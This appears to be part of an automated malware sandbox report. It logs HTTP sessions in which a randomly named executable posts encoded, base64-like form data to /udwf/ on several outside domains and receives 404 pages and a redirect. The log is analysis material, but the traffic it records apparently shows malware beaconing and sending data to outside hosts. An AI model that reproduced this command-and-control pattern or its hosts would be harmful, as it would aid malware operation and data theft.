                                                                                                                            Nov 10, 2023 09:29:53.438736916 CET288INData Raw: 63 6f 6e 74 65 6e 74 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 20 68 32 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 34 70 78 7d 2e 64 6f 6d 61 69 6e 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c
                                                                                                                            Data Ascii: content-relatedlinks h2{padding:3px 4px}.domain h1{font-size:2.2em;font-weight:bold;text-decoration:none;text-transform:lowercase}#container-sedologo{display:block;text-align:center}.oneclick.twot #container-content{margin-left:5%;margin-right


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            37192.168.2.1049752168.76.252.9980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:29:58.805006027 CET305OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 37 4e 4d 48 6d 50 5a 6e 39 49 6f 6a 54 66 50 6d 58 52 65 4c 46 69 4d 4f 79 46 48 73 64 47 74 43 58 72 56 35 6b 6f 79 66 6c 73 6d 69 6d 69 48 7a 79 49 59 5a 78 76 79 6c 6f 61 54 7a 6d 32 35 2f 6f 53 77 30 33 32 41 42 45 47 48 58 38 31 32 62 55 6a 66 33 74 44 66 49 70 73 54 4d 46 34 73 69 51 5a 4f 68 67 39 70 4f 4d 76 6d 45 65 48 59 2b 63 71 41 31 78 6b 48 34 31 75 71 62 70 77 6a 32 57 64 36 4b 73 69 61 37 41 59 6b 6a 4d 5a 45 70 7a 50 6b 37 64 36 39 67 73 66 41 42 74 33 67 62 50 75 6f 47 6b 33 55 4c 6d 6b 46 74 62 6f 6a 76 5a 41 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojTfPmXReLFiMOyFHsdGtCXrV5koyflsmimiHzyIYZxvyloaTzm25/oSw032ABEGHX812bUjf3tDfIpsTMF4siQZOhg9pOMvmEeHY+cqA1xkH41uqbpwj2Wd6Ksia7AYkjMZEpzPk7d69gsfABt3gbPuoGk3ULmkFtbojvZA==
                                                                                                                            Nov 10, 2023 09:29:59.154952049 CET305INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:29:57 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            38192.168.2.1049753168.76.252.9980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:02.966656923 CET307OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 37 4e 4d 48 6d 50 5a 6e 39 49 6f 6a 53 2f 66 6d 52 41 65 4c 53 53 4d 4e 39 6c 48 73 45 57 74 47 58 72 70 35 6b 74 53 50 6c 66 53 69 6d 44 33 7a 78 4b 77 5a 32 76 79 6c 69 36 54 36 72 57 35 34 6f 53 38 38 33 7a 67 42 45 47 44 58 38 31 6d 62 55 30 4c 30 69 7a 66 4f 69 4d 54 4b 59 6f 73 69 51 5a 4f 68 67 39 39 6f 4d 76 2b 45 65 32 6f 2b 64 4c 41 32 76 30 48 37 79 75 71 62 69 51 6a 79 57 64 36 34 73 6a 33 67 41 61 73 6a 4d 59 30 70 7a 64 63 38 54 4b 39 6d 6d 2f 42 77 6b 6e 46 4a 58 73 5a 2b 6c 48 38 31 34 78 52 39 65 39 50 38 65 36 44 64 43 58 75 49 73 78 74 32 35 56 5a 6e 66 36 70 74 74 6d 4d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojS/fmRAeLSSMN9lHsEWtGXrp5ktSPlfSimD3zxKwZ2vyli6T6rW54oS883zgBEGDX81mbU0L0izfOiMTKYosiQZOhg99oMv+Ee2o+dLA2v0H7yuqbiQjyWd64sj3gAasjMY0pzdc8TK9mm/BwknFJXsZ+lH814xR9e9P8e6DdCXuIsxt25VZnf6pttmM=
                                                                                                                            Nov 10, 2023 09:30:03.322711945 CET307INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:30:01 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            39192.168.2.1049754168.76.252.9980C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:30:05.842101097 CET309OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.lxdedu.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.lxdedu.com
                                                                                                                            Referer: http://www.lxdedu.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 37 4e 4d 48 6d 50 5a 6e 39 49 6f 6a 53 2f 66 6d 52 41 65 4c 53 53 4d 4e 39 6c 48 73 45 57 74 47 58 72 70 35 6b 74 53 50 6c 66 4b 69 6d 52 50 7a 78 74 73 5a 33 76 79 6c 68 36 54 2f 72 57 35 70 6f 53 6b 34 33 7a 73 52 45 45 4c 58 39 54 71 62 44 51 6e 30 35 6a 66 4f 74 73 54 50 46 34 73 37 51 5a 2b 6c 67 39 74 6f 4d 76 2b 45 65 31 67 2b 55 36 41 32 74 30 48 34 31 75 71 48 70 77 69 76 57 64 79 53 73 6a 7a 77 41 71 4d 6a 4d 34 6b 70 78 75 6b 38 52 71 39 6b 68 2f 42 6f 6b 6e 34 58 58 73 45 48 6c 47 59 54 34 78 70 39 50 6f 2b 4b 45 6f 2f 33 47 51 72 57 6a 43 6c 42 33 54 49 7a 50 37 35 33 76 69 2f 62 68 45 51 61 53 71 69 36 75 37 51 73 62 6a 6f 36 79 54 78 62 2b 36 64 42 76 6b 79 79 57 77 6c 59 68 68 6b 51 5a 38 6f 70 49 73 51 30 57 35 32 73 4d 4b 77 32 71 41 37 66 79 4a 46 37 49 2b 50 76 4c 52 79 4a 38 6f 67 6c 42 44 70 61 33 36 4f 2f 32 64 47 36 49 4a 6e 2f 37 7a 48 67 6f 46 4e 41 4f 4c 6f 6c 77 32 52 41 79 62 39 68 4d 37 6d 65 59 4a 5a 50 4a 32 52 4f 7a 49 70 55 61 45 75 52 73 44 6f 5a 74 46 62 55 48 37 65 32 32 7a 4d 58 78 36 71 51 38 4b 45 41 55 2f 50 4f 39 49 37 6a 54 36 50 76 4b 41 43 47 44 77 76 69 55 57 69 6b 2b 38 67 62 56 6f 64 56 2b 61 36 6c 37 71 46 48 71 42 32 66 66 4f 39 6a 5a 66 4c 4f 59 6d 55 68 63 74 72 49 38 65 4e 4c 4b 63 36 32 42 79 6b 6c 36 4c 33 46 6f 78 4f 64 32 46 6f 31 6a 32 2f 33 76 37 34 6f 75 74 51 6d 61 6e 72 5a 67 53 4d 4c 4b 46 67 76 44 6a 73 41 5a 62 41 6e 48 50 5a 65 61 79 66 4b 78 6e 51 39 35 43 47 55 35 65 72 2f 36 45 45 35 73 2f 4d 46 44 65 33 52 6a 70 71 78 79 71 63 73 44 73 62 43 32 7a 45 32 36 74 67 48 6e 78 78 68 30 47 6f 58 63 79 6d 53 4c 7a 62 70 31 4f 4b 6f 77 58 44 34 72 4b 4b 34 39 6d 6b 48 39 30 59 5a 79 6c 71 4f 6e 48 4b 53 4a 57 64 62 79 79 63 43 39 67 5a 64 47 49 37 57 51 37 79 58 35 59 48 78 4e 43 4b 79 34 63 72 61 73 2f 57 51 65 79 38 59 54 6e 2f 33 41 33 43 71 6f 79 42 45 44 6e 41 73 50 63 76 78 51 56 73 53 6b 6d 6d 76 2b 67 58 71 4f 33 67 63 64 52 30 73 4a 43 55 4d 79 41 4b 63 6b 50 67 6f 33 37 55 33 6d 58 4b 36 51 64 69 65 73 6c 30 55 42 44 65 6c 36 45 43 58 67 53 6f 52 6f 4b 2b 7a 70 66 70 59 4e 66 4b 56 6e 2f 4c 45 66 31 5a 75 4d 43 2f 43 63 32 53 49 58 66 43 50 4d 65 70 59 46 34 4e 2b 63 73 6a 59 59 2b 62 50 67 78 44 69 7a 35 67 39 6f 77 52 61 73 33 6a 69 6b 72 34 6d 79 41 36 55 75 6f 4d 72 45 48 63 73 6e 57 57 51 54 32 32 75 5a 59 5a 74 66 4c 48 71 41 32 31 75 47 48 79 79 42 79 72 57 6e 61 30 65 6d 74 6d 4e 71 71 49 5a 45 42 59 78 6e 2f 4f 76 6d 55 33 38 57 30 44 77 77 6f 33 6d 57 4c 39 64 76 6d 6f 37 50 30 79 64 35 4c 42 57 35 2f 33 39 4c 69 34 38 43 79 6a 6b 4e 45 65 6d 54 55 38 52 30 50 56 44 57 71 6c 42 53 44 73 51 61 39 4a 41 33 57 4b 58 43 2f 70 6b 58 4c 55 67 74 7a 79 42 78 47 6b 70 64 45 35 52 38 7a 31 66 57 77 4c 6c 61 36 6f 56 4d 73 34 49 66 6a 6d 30 30 71 52 6c 48 65 4b 6f 74 47 53 71 4c 32 43 74 55 64 2f 49 46 72 4c 42 74 78 74 68 5a 31 32 65 48 4c 63 44 35 6e 78 4f 56 4a 57 63 55 57 4b 63 35 38 4f 73 66 53 76 4c 43 33 62 79 48 48 77 31 33 32 41 78 66 6a 6e 56 53 74 48 54 68 42 79 78 69 2f 67 69 6d 54 66 6d 51 32 66 38 67 52 44 57 56 2f 6d 37 53 32 50 6e 2f 6b 70 36 61 6b 4a 4f 48 76 62 77 4f 50 63 6b 39 6f 72 39 6a 54 71 4b 63 50 56 64 50 59 6c 78 2f 74 58 78 46 76 75 64 53 63 49 72 6b 77 37 68 62 50 35 72 32 34 69 50 44 72 4b 69 30 41 44 31 6d 77 77 45 71 77 4d 64 6a 2b 78 58 49 31 62 36 37 36 6b 68 75 33 6d 75 4d 38 78 34 6c 44 44 63 32 43 62 68 56 77 54 61 39 32 31 6f 4a 2b 42 78 6a 67 77 2b 47 64 49 34 4e 59 44 47 35 70 4b 6f 4b 73 75 45 6e 61 64 55 68 47 48 78 6f 50 43 35 73 50 39 65 57 6c 66 36 49 4e 55 62 4c 33 5a 56 70 65 6a 34 76 34 65 35 50 54 61 52 6d 65 52 74 4c 7a 52 51 75 36 66 79 6c 64 38 72
                                                                                                                            Data Ascii: G0Yxd2Q=7NMHmPZn9IojS/fmRAeLSSMN9lHsEWtGXrp5ktSPlfKimRPzxtsZ3vylh6T/rW5poSk43zsREELX9TqbDQn05jfOtsTPF4s7QZ+lg9toMv+Ee1g+U6A2t0H41uqHpwivWdySsjzwAqMjM4kpxuk8Rq9kh/Bokn4XXsEHlGYT4xp9Po+KEo/3GQrWjClB3TIzP753vi/bhEQaSqi6u7Qsbjo6yTxb+6dBvkyyWwlYhhkQZ8opIsQ0W52sMKw2qA7fyJF7I+PvLRyJ8oglBDpa36O/2dG6IJn/7zHgoFNAOLolw2RAyb9hM7meYJZPJ2ROzIpUaEuRsDoZtFbUH7e22zMXx6qQ8KEAU/PO9I7jT6PvKACGDwviUWik+8gbVodV+a6l7qFHqB2ffO9jZfLOYmUhctrI8eNLKc62Bykl6L3FoxOd2Fo1j2/3v74outQmanrZgSMLKFgvDjsAZbAnHPZeayfKxnQ95CGU5er/6EE5s/MFDe3RjpqxyqcsDsbC2zE26tgHnxxh0GoXcymSLzbp1OKowXD4rKK49mkH90YZylqOnHKSJWdbyycC9gZdGI7WQ7yX5YHxNCKy4cras/WQey8YTn/3A3CqoyBEDnAsPcvxQVsSkmmv+gXqO3gcdR0sJCUMyAKckPgo37U3mXK6Qdiesl0UBDel6ECXgSoRoK+zpfpYNfKVn/LEf1ZuMC/Cc2SIXfCPMepYF4N+csjYY+bPgxDiz5g9owRas3jikr4myA6UuoMrEHcsnWWQT22uZYZtfLHqA21uGHyyByrWna0emtmNqqIZEBYxn/OvmU38W0Dwwo3mWL9dvmo7P0yd5LBW5/39Li48CyjkNEemTU8R0PVDWqlBSDsQa9JA3WKXC/pkXLUgtzyBxGkpdE5R8z1fWwLla6oVMs4Ifjm00qRlHeKotGSqL2CtUd/IFrLBtxthZ12eHLcD5nxOVJWcUWKc58OsfSvLC3byHHw132AxfjnVStHThByxi/gimTfmQ2f8gRDWV/m7S2Pn/kp6akJOHvbwOPck9or9jTqKcPVdPYlx/tXxFvudScIrkw7hbP5r24iPDrKi0AD1mwwEqwMdj+xXI1b676khu3muM8x4lDDc2CbhVwTa921oJ+Bxjgw+GdI4NYDG5pKoKsuEnadUhGHxoPC5sP9eWlf6INUbL3ZVpej4v4e5PTaRmeRtLzRQu6fyld8r
                                                                                                                            Nov 10, 2023 09:30:06.197726965 CET310INHTTP/1.1 404 Not Found
                                                                                                                            Content-Type: text/html
                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                            Date: Fri, 10 Nov 2023 08:30:04 GMT
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 596
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 4c 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2c 44 3d 64 6f 63 75 6d 65 6e 74 2c 61 3d 4c 2e 70 61 74 68 6e 61 6d 65 2c 62 3d 22 22 2c 63 3d 22 2f 22 2c 64 3d 22 6c 65 6e 67 74 68 22 3b 0d 0a 61 3d 61 2e 73 70 6c 69 74 28 63 29 3b 0d 0a 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 5b 64 5d 2d 32 3b 69 2b 2b 29 7b 62 2b 3d 63 2b 61 5b 69 5d 3b 7d 0d 0a 62 2b 3d 63 3b 0d 0a 44 2e 77 72 69 74 65 28 22 42 61 63 6b 20 74 6f 20 3c 61 20 68 72 65 66 3d 5c 22 22 2b 62 2b 22 5c 22 3e 22 2b 4c 2e 68 6f 73 74 2b 62 2b 22 3c 2f 61 3e 20 2c 20 77 61 69 74 69 6e 67 2e 2e 2e 2e 2e 22 29 3b 0d 0a 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 4c 2e 68 72 65 66 3d 62 3b 7d 2c 22 32 30 30 22 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><title>404 - </title></head><body><script type="text/javascript">var L=window.location,D=document,a=L.pathname,b="",c="/",d="length";a=a.split(c);for(var i=1;i<a[d]-2;i++){b+=c+a[i];}b+=c;D.write("Back to <a href=\""+b+"\">"+L.host+b+"</a> , waiting.....");setTimeout(function(){L.href=b;},"200");</script></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            4192.168.2.104971823.227.38.7480C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:27:53.388838053 CET101OUTGET /udwf/?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.littlehappiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:27:53.617281914 CET103INHTTP/1.1 301 Moved Permanently
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:53 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Sorting-Hat-PodId: 293
                                                                                                                            X-Sorting-Hat-ShopId: 83935199526
                                                                                                                            X-Storefront-Renderer-Rendered: 1
                                                                                                                            Location: https://littlehappiez.com/udwf?G0Yxd2Q=d3XFPJoaQLbhU6h03+z0XCc0ox6MaGmyEGZO6Ue9tsKz9KlFIum590y6ceFEWr4SYEQ/fNsJ5znTfk9k4b6SgMzLlK80QmTNVA==&vhQT=aV8PeNo0MvDl1
                                                                                                                            X-Redirect-Reason: https_required
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            Content-Security-Policy: frame-ancestors 'none';
                                                                                                                            X-ShopId: 83935199526
                                                                                                                            X-ShardId: 293
                                                                                                                            Vary: Accept
                                                                                                                            powered-by: Shopify
                                                                                                                            Server-Timing: processing;dur=11, db;dur=5, asn;desc="60068", edge;desc="SEA", country;desc="US", pageType;desc="404", servedBy;desc="kpkm", requestID;desc="113f9483-cc9b-4298-a502-d546ed1fa34a"
                                                                                                                            X-Shopify-Stage: production
                                                                                                                            X-Dc: gcp-us-west1,gcp-us-central1,gcp-us-central1
                                                                                                                            X-Request-ID: 113f9483-cc9b-4298-a502-d546ed1fa34a
                                                                                                                            X-Download-Options: noopen
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B%2FjARrOFzBauoLACLG6hSrB3yPh8X4Wq1cLmfvM2rqdXI7QCcSRUe2dLimG160P9PIvSdU2%2B7zLGuiP5V7gRwaJqLwvnWgQ127vLjWFicqv2K
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
